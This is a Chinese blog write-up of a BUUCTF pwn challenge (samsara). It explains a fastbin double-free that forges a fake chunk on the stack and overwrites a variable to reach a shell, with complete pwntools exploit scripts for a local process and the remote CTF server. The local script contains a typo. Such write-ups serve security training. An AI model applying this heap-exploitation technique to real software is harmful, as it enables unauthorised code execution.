pwn刷题num46----fast bin double free (控制free chunk的fd指针指向,栈上伪造的fake chunk,修改栈上变量值)

已于 2022-05-09 12:55:53 修改
阅读量1k 收藏 2
点赞数 1
分类专栏: 堆利用 pwn BUUCTF 文章标签: 安全 c语言 网络安全 linux 系统安全
于 2022-05-03 18:01:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124557259
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏
堆利用
18 篇文章 1 订阅
订阅专栏

BUUCTF-PWN-metasequoia_2020_samsara

在这里插入图片描述
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

在这里插入图片描述

保护全开
动态链接

在这里插入图片描述
在这里插入图片描述
英文意思

打败魔龙后,你变成了魔龙……
 1. 抓捕一个人 
 2. 吃掉一个人
 3. 煮一个人 
 4.  找到你的巢穴 
 5. 转移到另一个王国 
 6. 自杀

ida看一下伪代码
主函数
在这里插入图片描述

在这里插入图片描述

还有一个菜单函数
在这里插入图片描述
观察分析main函数,switch里case1每次申请chunk大小为0x20(mem为0x10),
case6只要满足了target=0xDEADBEEF,就可以获得shell
看一下栈区
在这里插入图片描述

思路

switch里case2里free掉chunk后,未把指针置空
case3可以编辑chunk的mem内容,如果是free后的chunk,就可以编辑该chunk的fd指针指向
case4可以输出lair地址,而case5可以修改lair的地址,所以可以用case4和case5泄露任意地址的地址
可以先申请三个chunk,(前两个chunk用来double free,第三个chunk用来防止free掉前两个chunk与top chunk合并),然后释放前两个chunk,把第一个chunk释放两次,造成double free,然后可以控制free掉的第一个chunk,之后在栈上构造fake chunk,利用case4修改lair值为0x20(作为fake chunk的size)(与前面的chunk大小相同),再根据lair在栈上位置与target相差8字节,所以将&lair-8作为fake chunk的chunk指针,之后利用switch中的case3编辑free掉的第一个chunk,使它的fd指针指向fake chunk的chunk指针(&lair-8),然后申请chunk(第一个chunk),再次申请chunk(fake chunk),之后用switch里的case5,修改mem(target)为0xDEADBEEF即可调用system函数,获得shell

exp本地调试

from pwn import  *
context(os='linux',endian='little',log_level='debug',arch='amd64') 
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
binary = './samsara' 
elf = ELF(binary)
#sh = remote('node4.buuoj.cn',28614)  
sh = process(binary)


def dbg():
	gdb.attachsh)
	pause()

 
def add():
	sh.sendlineafter('> ','1')

def delete(index):
	sh.sendlineafter('> ','2')
	sh.sendlineafter(':\n',str(index))

def edit(index,content):
	sh.sendlineafter('> ','3')
	sh.sendlineafter(':\n',str(index))
	sh.sendlineafter(':\n',content)

def show():
	sh.sendlineafter('> ','4')
	sh.recvuntil('0x')  
	return int(sh.recvuntil('\n'),16)

def move(dest):
	sh.sendlineafter('> ','5')
	sh.sendlineafter('?\n', str(dest))

add() # 申请第0个chunk
add() # 申请第1个chunk
add() # 申请第2个chunk
 
delete(0)  #free 第0个chunk
delete(1)	#free 第1个chunk

dbg() #第一个断点

delete(0)	#free 第0个chunk造成double free

dbg()#第2个断点

add() # 申请第3个chunk ==  第0个chunk
add() #  申请第4个chunk ==  第1个chunk


move(0x20)	#修改lair值为0x20(作为fake chunk的size)(与前面的chunk大小相同)
fake = show()-8 #将&lair-8作为fake chunk的chunk指针


edit(3,fake) #编辑free掉的第一个chunk,使它的fd指针指向fake chunk的chunk指针(&lair-8)
dbg()#第3个断点
add() # 申请第5个chunk == 第0个chunk
add() # 申请第6个chunk (mem内容为target)

dbg()#第4个断点

edit(6,0xdeadbeef) #修改mem(target)为0xDEADBEEF

dbg()#第5个断点
sh.sendlineafter('> ','6') #退出程序

sh.interactive()

运行
在这里插入图片描述
在这里插入图片描述

第一个断点处,可以看到fast bin里已经存了两个chunk,从左到右为第2个chunk和第1个chunk
在这里插入图片描述

第2个断点处,可以看到已经造成doubel free
在这里插入图片描述

第3个断点处,可以看到fast bin里chunk0指针指向了0x7ffe651ac6a0(fake chunk)
在这里插入图片描述

第4个断点处,可以看到fast bin里已经没有chunk了
在这里插入图片描述

第5个断点处,可以看到target已经被修改为了0xDEADBEEF

exp远程

from pwn import  *
context(os='linux',endian='little',log_level='debug',arch='amd64') 
context.terminal = ["gnome-terminal", "-x", "sh", "-c"]
binary = './samsara' 
elf = ELF(binary)
sh = remote('node4.buuoj.cn',28614)  
#sh = process(binary)
 
def dbg():
	gdb.attach(sh)
	pause()

 
def add():
	sh.sendlineafter('> ','1')

def delete(index):
	sh.sendlineafter('> ','2')
	sh.sendlineafter(':\n',str(index))

def edit(index,content):
	sh.sendlineafter('> ','3')
	sh.sendlineafter(':\n',str(index))
	sh.sendlineafter(':\n',str(content))

def show():
	sh.sendlineafter('> ','4')
	sh.recvuntil('0x')  
	return int(sh.recvuntil('\n'),16)

def move(dest):
	sh.sendlineafter('> ','5')
	sh.sendlineafter('?\n', str(dest))

add() # 申请第0个chunk
add() # 申请第1个chunk
add() # 申请第2个chunk
 
delete(0)  #free 第0个chunk
delete(1)	#free 第1个chunk

  
delete(0)	#free 第0个chunk造成double free
 
add() # 申请第3个chunk ==  第0个chunk
add() #  申请第4个chunk ==  第1个chunk
 
move(0x20)	#修改lair值为0x20(作为fake chunk的size)(与前面的chunk大小相同)
fake = show()-8 #将&lair-8作为fake chunk的chunk指针

edit(3,fake) #编辑free掉的第一个chunk,使它的fd指针指向fake chunk的chunk指针(&lair-8)
 
add() # 申请第5个chunk == 第0个chunk
add() # 申请第6个chunk (mem内容为target)
 
edit(6,0xdeadbeef) #修改mem(target)为0xDEADBEEF
 
sh.sendlineafter('> ','6') #退出程序

sh.interactive()

运行获得flag
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
一道堆方向的pwndouble free & unsorted bins)
F_Day_的博客
10-17 812
一道堆方向的pwndouble free & unsorted bins)做题环境什么是double free 在某博客上看到了一道堆的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
pwn-double free
最新发布
xy_369的博客
05-21 341
指针情况:(只连续free两次xy1不行,有检查机制,中间必须free一个同等大小的chunk才能绕过检查机制,检查机制)一个神奇的现象:xy1 中输入的数据同时也输进了 Top chunk。1、代码及编译指令(运行环境:ubuntu16.04)
linux_pwn(2)--double free&&qwb2018_raisepig
azraelxuemo的博客
03-05 1310
文章目录What is double freepwn题例题add函数show函数delete函数开始做题准备框架调试泄露libcdouble freeexp总结 What is double free double free顾名思义,两次释放,在ctf里面一般就是对同一个内存块释放了两次,其实这个跟之前的uaf产生的方式有点类似,都是需要满足指针没有被置NULL ptr=malloc(0x10) ptr2=malloc(0x10) free(ptr) free(ptr2) free(ptr) 由于直接连续
ctf-pwn tc和smallbindoublefree利用
蚁景网安学院
07-15 422
前言:之前曾经有了解过libc.2.31下tc和smallbin的联合利用, 但是那次看到的是malloc与calloc的使用, 所以这次借助TCTF2021的listbook来讲讲2.3...
[pwn]堆:熟练掌握double free+unlink
Breeze的博客
09-06 8991
double free+unlink 4-ReeHY-main-100 writeup 一道经典的堆溢出题目4-ReeHY-main-100 题目分析 江湖规矩,先看安全策略: 还可以,没有full relro说明可以修改got表。然后看看程序的逻辑: 一看到菜单基本就是堆得题目没跑了,然后IDA查看反汇编代码: create函数(我改名后): 整个create函数充斥着符号溢出的味道… 然...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ciscn_final_4(反调试+在栈上伪造chunk)
seaaseesa的博客
04-30 1113
ciscn_final_4 首先,检查一下程序的保护机制,没开PIE 沙箱禁用了execve,因此不能getshell,只能构造ROP来读取flag 然后,我们用IDA分析一下 Delete功能没有清空堆指针,存在UAF可以造成double free new功能可以自由控制大小 程序一开始,我们可以在栈里输入一些数据,因此,我们可以在栈里伪造一个chunk,然后利用fa...
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3139
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
free_spirit(在栈上爆破一个可以被freefake_chunk
seaaseesa的博客
07-01 397
free_spirit(在栈上爆破一个可以被freefake_chunk) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,功能3存在8字节溢出,将会把v7下面的buf指针覆盖掉,而覆盖了buf指针,就能实现任意地址写。 那么,我们劫持函数栈返回地址为one_gadget即可,为了绕过结尾对buf的检查,我们的buf非0,且free后不会报错。 但是我们泄露不了堆地址,因此,只能在栈上找一个合适的fake_chunk,因此,可以直接在栈上爆破,直到程序不崩溃,那..
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]
九层台
04-25 1767
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意写 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...
BUUCTF pwn wp 131 - 135
fa1c4的blog
04-27 557
rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4577
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 765
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
CTFpwn总结 入门
热门推荐
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
glibc2.31下的新double free手法/字节跳动pwn题gun题解
chennbnbnb的博客
12-02 4107
回顾double free手法 在glibc2.27之前,主要是fastbin double freefastbinfree时只会检查现在释放的chunk,是不是开头的chunk,因此可以通过free(C1), free(C2), free(C1)的手法绕过 并在在fastbin取出时,会检查size字段是不是属于这个fastbin,因此往往需要伪造一个size glibc2.27~glibc2.28,主要是tcache double free 相较于fastbin double fr
Double Free浅析(泄露堆地址的一种方法)
omnispace的博客
04-18 7190
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。double free的原理其实和堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的堆溢出伪造chunk然后free触发unlink...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值